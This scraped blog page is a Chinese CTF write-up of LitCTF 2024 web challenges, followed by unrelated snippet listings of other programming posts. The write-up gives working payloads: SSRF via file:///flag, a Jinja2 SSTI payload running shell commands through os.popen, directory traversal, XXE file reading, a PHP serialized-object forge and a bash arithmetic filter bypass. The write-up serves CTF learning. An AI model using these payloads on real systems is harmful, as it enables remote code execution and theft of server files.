当前位置：首页 > news >正文

【Web】LitCTF 2024 题解(全)

news 2026/2/7 12:29:50

浏览器也能套娃？

一个....池子？

高亮主题(划掉)背景查看器

百万美元的诱惑

SAS - Serializing Authentication

exx

浏览器也能套娃？

随便试一试，一眼ssrf

file:///flag直接读本地文件

一个....池子？

{{7*7}}测出SSTI

随便找个payload打了

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('tac /f*').read()")}}

高亮主题(划掉)背景查看器

一眼文件包含漏洞

../../../../flag

目录穿越拿到flag

百万美元的诱惑

?a[]=1&b[]=2&c=2025.a

过了php八股

访问./dollar.php

参考ctfshow web57

【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客

0=$(())12=$((~$((-13))))-13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

SAS - Serializing Authentication

傻瓜题

<?phpclass User {public $username;public $password;}$user=new User();
$user->username='admin';
$user->password='secure_password';
echo base64_encode(serialize($user));
?>

exx

以xml形式传数据，打xxe

直接读文件

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin</password></user>

【Web】LitCTF 2024 题解(全)

目录浏览器也能套娃？ 一个....池子？ 高亮主题(划掉)背景查看器百万美元的诱惑 SAS - Serializing Authentication exx 浏览器也能套娃？ 随便试一试，一眼ssrf file:///flag直接读本地文件一个....池子？ {…...

编程日记 2024/7/26 22:22:08

家政项目小程序的设计

管理员账户功能包括：系统首页，个人中心，用户管理，家政人员管理，家政服务管理，咨询信息管理，咨询服务管理，家政预约管理，留言板管理，系统管理微信端账号功能…...

编程日记 2024/7/26 22:21:07

electron TodoList网页应用打包成linux deb、AppImage应用

这里用的是windows的wsl的ubuntu环境 electron应用打包linux应用需要linux下打包，这里用windows的wsl的ubuntu环境进行操作 1）linux ubuntu安装nodejs、electron 安装nodejs： sudo apt update sudo apt upgrade ##快捷安装 curl -fsSL http…...

编程日记 2024/7/26 22:20:06

【C语言】使用fgets和fputs完成两个文件的拷贝

目录 1、使用fgets和fputs完成两个文件的拷贝 2、使用fgets统计给定文件的行号 fgets和fputs的使用方法函数原型：int fputs（const char *s,FILE *stream)； char *fgets(char *s,int size,FILE *stream)；fupts…...

编程日记 2024/7/26 22:18:05

使用PyTorch导出JIT模型：C++ API与libtorch实战

PyTorch导出JIT模型并用C API libtorch调用本文将介绍如何将一个 PyTorch 模型导出为 JIT 模型并用 PyTorch 的 CAPI libtorch运行这个模型。 Step1：导出模型首先我们进行第一步，用 Python API 来导出模型，由于本文的重点是在后面的部署…...

编程日记 2024/7/26 22:17:03

Python——异常捕获，传递及其抛出操作

01. 异常的概念 1. 程序在运行时，如果 python解释器遇到一个错误，会停止程序的执行，并且提示一些错误信息，这就是异常。 2. 程序停止执行并且提示错误信息这个动作，我们通常称之为：抛出（raise…...

编程日记 2024/7/26 22:14:01

【Maven】的继承机制

Maven是一个强大的项目管理工具，主要用于Java项目的构建和管理。它以其项目对象模型（POM）为基础，允许开发者定义项目的依赖、构建过程和插件。Maven的继承机制是其核心特性之一，它允许子项目继承和复用父项目的配置&am…...

编程日记 2024/7/26 22:09:57

微信小程序结合后端php发送模版消息

前端： <view class"container"><button bindtap"requestSubscribeMessage">订阅消息</button> </view> // index.js Page({data: {tmplIds: [UTgCUfsjHVESf5FjOzls0I9i_FVS1N620G2VQCg1LZ0] // 使用你的模板ID},requ…...

编程日记 2024/7/26 22:08:55

sqlalchemy报错sqlalchemy.orm.exc.DetachedInstanceError

解决方案： 在初始化数据库的代码中，将 maker sessionmaker(bindeng)修改为 maker sessionmaker(bindeng, expire_on_commitFalse)为什么要添加 expire_on_commitFalse 参数？ expire_on_commit 可以用来更改 SQLAlchemy 的对象刷新机制&…...

编程日记 2024/7/26 22:04:51

华为网络模拟器eNSP安装部署教程

eNSP是图形化网络仿真平台，该平台通过对真实网络设备的仿真模拟，帮助广大ICT从业者和客户快速熟悉华为数通系列产品，了解并掌握相关产品的操作和配置、提升对企业ICT网络的规划、建设、运维能力，从而帮助企业构建更高效&#xff0…...

编程日记 2024/7/26 22:03:50

【React】详解样式控制：从基础到进阶应用的全面指南

文章目录一、内联样式1. 什么是内联样式？2. 内联样式的定义3. 基本示例4. 动态内联样式二、CSS模块1. 什么是CSS模块？2. CSS模块的定义3. 基本示例4. 动态应用样式三、CSS-in-JS1. 什么是CSS-in-JS？2. styled-components的定义3. 基本示例…...

编程日记 2024/7/26 22:00:48

【ROS2】高级:安全-理解安全密钥库

目标：探索位于 ROS 2 安全密钥库中的文件。教程级别：高级时间：15 分钟内容背景安全工件位置公钥材料私钥材料域治理政策安全飞地参加测验！ 背景在继续之前，请确保您已完成设置安全教程。 sros2 包可以用来创…...

编程日记 2024/7/26 21:58:46

C语言 ——— 数组指针的定义数组指针的使用

目录前言数组指针的定义数组指针的使用前言之前有编写过关于指针数组的相关知识 C语言 ——— 指针数组 & 指针数组模拟二维整型数组-CSDN博客指针数组顾名思义就是存放指针的数组那什么是数组指针呢？ 数组指针的定义何为数组指针&#xf…...

编程日记 2024/7/26 21:55:44

opencascade AIS_ManipulatorOwner AIS_MediaPlayer源码学习

前言 AIS_ManipulatorOwner是OpenCascade中的一个类，主要用于操纵对象的交互控制。AIS_ManipulatorOwner结合AIS_Manipulator类，允许用户通过可视化工具（如旋转、平移、缩放等）来操纵几何对象。以下是AIS_ManipulatorOwner的基…...

编程日记 2024/7/26 21:52:41

如何防止用户通过打印功能复制页面文字

简单防白嫖，要让打印出来的页面是空白，通常的做法是在打印时隐藏页面上的所有内容。这可以通过CSS的媒体查询（Media Queries）来实现，特别是针对media print的查询。在JavaScript中，你通常不会直接控制打印…...

编程日记 2024/7/26 21:51:40

Python3网络爬虫开发实战（3）网页数据的解析提取

文章目录一、XPath1. 选取节点2. 查找某个特定的节点或者包含某个指定的值的节点3. XPath 运算符4. 节点轴5. 利用 lxml 使用 XPath 二、CSS三、Beautiful Soup1. 信息提取2. 嵌套选择3. 关联选择4. 方法选择器5. css 选择器四、PyQuery1. 初始化2. css 选择器3. 信息提取4. …...

编程日记 2024/7/26 21:49:38

基于 HTML+ECharts 实现监控平台数据可视化大屏（含源码）

构建监控平台数据可视化大屏：基于 HTML 和 ECharts 的实现监控平台的数据可视化对于实时掌握系统状态、快速响应问题至关重要。通过直观的数据展示，运维团队可以迅速发现异常，优化资源配置。本文将详细介绍如何利用 HTML 和 ECharts 实现一个…...

编程日记 2024/7/26 21:48:37

立创梁山派--移植开源的SFUD和FATFS实现SPI-FLASH文件系统

本文主要是在sfud的基础上进行fatfs文件系统的移植，并不对sfud的移植再进行过多的讲解了哦，所以如果想了解sfud的移植过程，请参考我的另外一篇文章：传送门正文开始咯首先我们需要先准备资料准备好，这里对于fatfs的…...

编程日记 2024/7/26 21:45:35

MySQL之视图和索引实战

1.新建数据库 mysql> create database myudb5_indexstu; Query OK, 1 row affected (0.01 sec) mysql> use myudb5_indexstu; Database changed 2.新建表 1.学生表student，定义主键，姓名不能重名，性别只能输入男或女，所在…...

编程日记 2024/7/26 21:42:32

快速参考：用C# Selenium实现浏览器窗口缩放的步骤

背景介绍在现代网络环境中，浏览器自动化已成为数据抓取和测试的重要工具。Selenium作为一个强大的浏览器自动化工具，能够与多种编程语言结合使用，其中C#是非常受欢迎的选择之一。在实际应用中，我们常常需要调整浏览器窗口的缩放…...

编程日记 2024/7/26 21:41:31

线程同步：确保多线程程序的安全与高效！

全文目录： 开篇语前序前言第一部分：线程同步的概念与问题1.1 线程同步的概念1.2 线程同步的问题1.3 线程同步的解决方案第二部分：synchronized关键字的使用2.1 使用 synchronized修饰方法2.2 使用 synchronized修饰代码块第三部分&#xff…...

编程新知 2025/9/24 16:02:40

SCAU期末笔记 - 数据分析与数据挖掘题库解析

这门怎么题库答案不全啊日来简单学一下子来一、选择题（可多选） 将原始数据进行集成、变换、维度规约、数值规约是在以下哪个步骤的任务?(C) A. 频繁模式挖掘 B.分类和预测 C.数据预处理 D.数据流挖掘 A. 频繁模式挖掘：专注于发现数据中…...

编程新知 2026/1/24 14:15:43

【JVM】- 内存结构

引言 JVM：Java Virtual Machine 定义：Java虚拟机，Java二进制字节码的运行环境好处： 一次编写，到处运行自动内存管理，垃圾回收的功能数组下标越界检查（会抛异常，不会覆盖到其他代码…...

编程新知 2026/1/30 13:40:43

C# 类和继承(抽象类)

抽象类抽象类是指设计为被继承的类。抽象类只能被用作其他类的基类。不能创建抽象类的实例。抽象类使用abstract修饰符声明。抽象类可以包含抽象成员或普通的非抽象成员。抽象类的成员可以是抽象成员和普通带实现的成员的任意组合。抽象类自己可以派生自另一个抽象类。例…...

编程新知 2026/1/29 16:25:24

文章目录 A 基础语言模型A.1 TransformerA.2 Bert B 大语言模型结构B.1 GPTB.2 LLamaB.3 ChatGLMB.4 Qwen C 大语言模型微调C.1 Fine-tuningC.2 Adapter-tuningC.3 Prefix-tuningC.4 P-tuningC.5 LoRA A 基础语言模型 A.1 Transformer （1）资源论文&a…...

编程新知 2026/1/23 11:58:06